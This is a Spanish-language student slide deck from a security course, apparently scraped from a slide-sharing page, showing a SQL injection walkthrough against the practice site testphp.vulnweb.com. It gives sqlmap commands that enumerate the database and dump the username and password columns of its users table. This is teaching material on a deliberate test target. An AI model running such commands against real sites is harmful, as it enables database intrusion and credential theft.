3
Lo más leído
4
Lo más leído
6
Lo más leído
Especialización en 
Seguridad Informática 
Ataque por inyección de código SQL a 
sitio Web 
JOSÉ ALFREDO RAMÍREZ PRADA 
Espinal, Septiembre de 2014
Ataque a sitio Web 
http://testphp.vulnweb.com 
Realizar un ataque a la base de datos del sitio 
http://testphp.vulnweb.com, con lo cual se debe obtener toda la 
información sobre la base de datos por ejemplo servidor de BD y 
versión, nombre de la base de datos, nombre de las tablas, información 
de las tablas, información de las columnas, etc.
Ataque a sitio Web 
http://testphp.vulnweb.com 
Se inicia el ataque en la pagina Web, por ejemplo se introduce una 
comilla en el campo “Search” del formulario «Browse artists", 
seguidamente en la direccion URL despues del signo igual se escribe 
una comilla sencilla (´) y observamos un mensaje de error SQL.
Identificada la vulnerabilidad, podemos atacar por medio de la consola 
de comando de Windows, ubicados en el directorio C:sqlmap 
sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --current-db 
Se confirma la vulnerabilidad y 
sqlmap ha sido capaz de detectar 
el motor de base de datos MySQL 
5.0.11 y el servidor Web PHP 
5.3.10, el nombre de la base de 
datos ‘ACUART'. 
Ataque a sitio Web 
http://testphp.vulnweb.com
Ataque a sitio Web 
http://testphp.vulnweb.com 
Seguidamente podemos identificar las tablas de la Base de Datos por medio del 
comando: 
sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --tables
Ataque a sitio Web 
http://testphp.vulnweb.com 
una vez identificada la tabla (users) podremos identificar información de las 
columnas, correspondientemente con los siguientes comandos: 
sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --columns
Ataque a sitio Web 
http://testphp.vulnweb.com 
una vez identificadas las columnas de la tabla procedemos a verificar la información 
de los campos “uname, pass, name” de la tabla users, 
sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T – C uname --dump 
sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T – C pass --dump 
sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T – C name --dump
Ataque a sitio Web 
http://testphp.vulnweb.com 
De esta forma obtenemos toda la información de la base de datos del sitio Web.
Especialización en 
Seguridad Informática

Más contenido relacionado

PPTX
Static Analysis Security Testing for Dummies... and You
PPT
VIRUS INFORMATICOS
PDF
Ataques - Conceptos Técnicas
PDF
Manual del método CoPsoQ-istas21
PPTX
Bsides SP 2022 - EPSS - Final.pptx
PPTX
Magerit Metodologia
PDF
Microsoft threat modeling tool 2016
PDF
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
Static Analysis Security Testing for Dummies... and You
VIRUS INFORMATICOS
Ataques - Conceptos Técnicas
Manual del método CoPsoQ-istas21
Bsides SP 2022 - EPSS - Final.pptx
Magerit Metodologia
Microsoft threat modeling tool 2016
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto

La actualidad más candente (20)

PDF
Ntc 4116
DOCX
Fichas tecnicas de software
PPT
PDF
Gestión de riesgos de software
PDF
BruCON 2015 - Pentesting ICS 101
PDF
Criptografía y esteganografía
PPTX
Defending Your "Gold"
PPTX
Sql injection attack
PDF
Ceh v5 module 11 hacking webservers
PDF
Secure Coding and Threat Modeling
PDF
Actividad No. 1.11: SQL Injection con sqlmap en Kali Linux
PDF
Owasp SAMM v1.5
PDF
Secure coding presentation Oct 3 2020
PDF
CNIT 124 Ch 13: Post Exploitation (Part 1)
PDF
Web Uygulama Güven(siz)liği
PPTX
PPTX
ICS Security 101 by Sandeep Singh
PDF
Mitigacion de ataques DDoS
DOCX
Análisis de riesgos de un proyecto de software
PPTX
Catch Me If You Can: PowerShell Red vs Blue
Ntc 4116
Fichas tecnicas de software
Gestión de riesgos de software
BruCON 2015 - Pentesting ICS 101
Criptografía y esteganografía
Defending Your "Gold"
Sql injection attack
Ceh v5 module 11 hacking webservers
Secure Coding and Threat Modeling
Actividad No. 1.11: SQL Injection con sqlmap en Kali Linux
Owasp SAMM v1.5
Secure coding presentation Oct 3 2020
CNIT 124 Ch 13: Post Exploitation (Part 1)
Web Uygulama Güven(siz)liği
ICS Security 101 by Sandeep Singh
Mitigacion de ataques DDoS
Análisis de riesgos de un proyecto de software
Catch Me If You Can: PowerShell Red vs Blue
Publicidad

Destacado (8)

DOC
PPTX
Ataque sql web
PPT
Relacionar tablas de bases de datos
PPTX
Como relacionar tablas de una base de datos
PDF
Tablas, Codigos De Base De Datos
PDF
Creación de tablas y relaciones en MySQL y wamp server
DOCX
Codigo para crear la base de datos
Ataque sql web
Relacionar tablas de bases de datos
Como relacionar tablas de una base de datos
Tablas, Codigos De Base De Datos
Creación de tablas y relaciones en MySQL y wamp server
Codigo para crear la base de datos
Publicidad

Similar a 2. ataque por inyección de código sql a sitio web (20)

PPTX
Ataque con inyeccion de codigo sql a sitio web
PPTX
ATAQUES POR INYECCIÓN DE CÓDIGO SQL Y SNIFFING
PPTX
Presentación ataque 1 sql
PPTX
Ataques a bases de datos
PDF
Presentacion practica seguridad bd
PDF
ATAQUE CON INYECCIÓN DE CÓDIGO SQL A SITIO WEB
PDF
Ataque por inyección de código sql y sniffing
DOCX
Articulo ieee ataque_i
PPTX
Ataque inyeccion sql
PPTX
Ataque por inyección de código sql
PPTX
Practica 1 seguridad en bases de datos
PDF
Presentación Workshop php Barcelona Seguridad
PDF
Introducción a las vulnerabilidades web
DOCX
Momento 2 Bases de Datos - Inyeccion SQL y Sniffing
PDF
Investigacion formativa 4 (trabajo grupal)proyecto base de datos
PDF
Art hack web-v1-4
PPTX
Desarrollo Web Seguro - Seguridad en Programación
PPTX
Hacking Web: Attacks & Tips
PPTX
Vulnerabilidades web
ODP
Seguridad en aplicaciones web
Ataque con inyeccion de codigo sql a sitio web
ATAQUES POR INYECCIÓN DE CÓDIGO SQL Y SNIFFING
Presentación ataque 1 sql
Ataques a bases de datos
Presentacion practica seguridad bd
ATAQUE CON INYECCIÓN DE CÓDIGO SQL A SITIO WEB
Ataque por inyección de código sql y sniffing
Articulo ieee ataque_i
Ataque inyeccion sql
Ataque por inyección de código sql
Practica 1 seguridad en bases de datos
Presentación Workshop php Barcelona Seguridad
Introducción a las vulnerabilidades web
Momento 2 Bases de Datos - Inyeccion SQL y Sniffing
Investigacion formativa 4 (trabajo grupal)proyecto base de datos
Art hack web-v1-4
Desarrollo Web Seguro - Seguridad en Programación
Hacking Web: Attacks & Tips
Vulnerabilidades web
Seguridad en aplicaciones web

Último (20)

PDF
ADMINISTRACIÓN DE ARCHIVOS - TICS (SENA).pdf
PDF
TRABAJO DE TECNOLOGIA.pdf...........................
PPTX
Curso de generación de energía mediante sistemas solares
DOCX
Trabajo informatica joel torres 10-.....................
PPTX
ccna: redes de nat ipv4 stharlling cande
PPTX
Presentacion de Alba Curso Auditores Internos ISO 19011
PDF
Taller tecnológico Michelle lobo Velasquez
DOCX
TRABAJO GRUPAL (5) (1).docxsjsjskskksksksks
PDF
Estrategia de apoyo valentina lopez/ 10-3
PPTX
ccna: redes de nat ipv4 stharlling cande
PPTX
Control de calidad en productos de frutas
PDF
capacitación de aire acondicionado Bgh r 410
PPT
Protocolos de seguridad y mecanismos encriptación
PPTX
Diapositivas Borrador Rocha Jauregui David Paolo (3).pptx
DOCX
TRABAJO GRUPAL (5) (1).docxsjjsjsksksksksk
PDF
NREN - red nacional de investigacion y educacion en LATAM y Europa: Caracteri...
DOCX
Guía 5. Test de orientación Vocacional 2.docx
PDF
Guía_de_implementación_Marco_de_gobierno_y_gestión_de_TI_Universidades.pdf
PDF
MANUAL de recursos humanos para ODOO.pdf
PDF
Documental Beyond the Code (Dossier Presentación - 2.0)
ADMINISTRACIÓN DE ARCHIVOS - TICS (SENA).pdf
TRABAJO DE TECNOLOGIA.pdf...........................
Curso de generación de energía mediante sistemas solares
Trabajo informatica joel torres 10-.....................
ccna: redes de nat ipv4 stharlling cande
Presentacion de Alba Curso Auditores Internos ISO 19011
Taller tecnológico Michelle lobo Velasquez
TRABAJO GRUPAL (5) (1).docxsjsjskskksksksks
Estrategia de apoyo valentina lopez/ 10-3
ccna: redes de nat ipv4 stharlling cande
Control de calidad en productos de frutas
capacitación de aire acondicionado Bgh r 410
Protocolos de seguridad y mecanismos encriptación
Diapositivas Borrador Rocha Jauregui David Paolo (3).pptx
TRABAJO GRUPAL (5) (1).docxsjjsjsksksksksk
NREN - red nacional de investigacion y educacion en LATAM y Europa: Caracteri...
Guía 5. Test de orientación Vocacional 2.docx
Guía_de_implementación_Marco_de_gobierno_y_gestión_de_TI_Universidades.pdf
MANUAL de recursos humanos para ODOO.pdf
Documental Beyond the Code (Dossier Presentación - 2.0)

2. ataque por inyección de código sql a sitio web

  • 1. Especialización en Seguridad Informática Ataque por inyección de código SQL a sitio Web JOSÉ ALFREDO RAMÍREZ PRADA Espinal, Septiembre de 2014
  • 2. Ataque a sitio Web http://testphp.vulnweb.com Realizar un ataque a la base de datos del sitio http://testphp.vulnweb.com, con lo cual se debe obtener toda la información sobre la base de datos por ejemplo servidor de BD y versión, nombre de la base de datos, nombre de las tablas, información de las tablas, información de las columnas, etc.
  • 3. Ataque a sitio Web http://testphp.vulnweb.com Se inicia el ataque en la pagina Web, por ejemplo se introduce una comilla en el campo “Search” del formulario «Browse artists", seguidamente en la direccion URL despues del signo igual se escribe una comilla sencilla (´) y observamos un mensaje de error SQL.
  • 4. Identificada la vulnerabilidad, podemos atacar por medio de la consola de comando de Windows, ubicados en el directorio C:sqlmap sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --current-db Se confirma la vulnerabilidad y sqlmap ha sido capaz de detectar el motor de base de datos MySQL 5.0.11 y el servidor Web PHP 5.3.10, el nombre de la base de datos ‘ACUART'. Ataque a sitio Web http://testphp.vulnweb.com
  • 5. Ataque a sitio Web http://testphp.vulnweb.com Seguidamente podemos identificar las tablas de la Base de Datos por medio del comando: sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --tables
  • 6. Ataque a sitio Web http://testphp.vulnweb.com una vez identificada la tabla (users) podremos identificar información de las columnas, correspondientemente con los siguientes comandos: sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --columns
  • 7. Ataque a sitio Web http://testphp.vulnweb.com una vez identificadas las columnas de la tabla procedemos a verificar la información de los campos “uname, pass, name” de la tabla users, sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T – C uname --dump sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T – C pass --dump sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T – C name --dump
  • 8. Ataque a sitio Web http://testphp.vulnweb.com De esta forma obtenemos toda la información de la base de datos del sitio Web.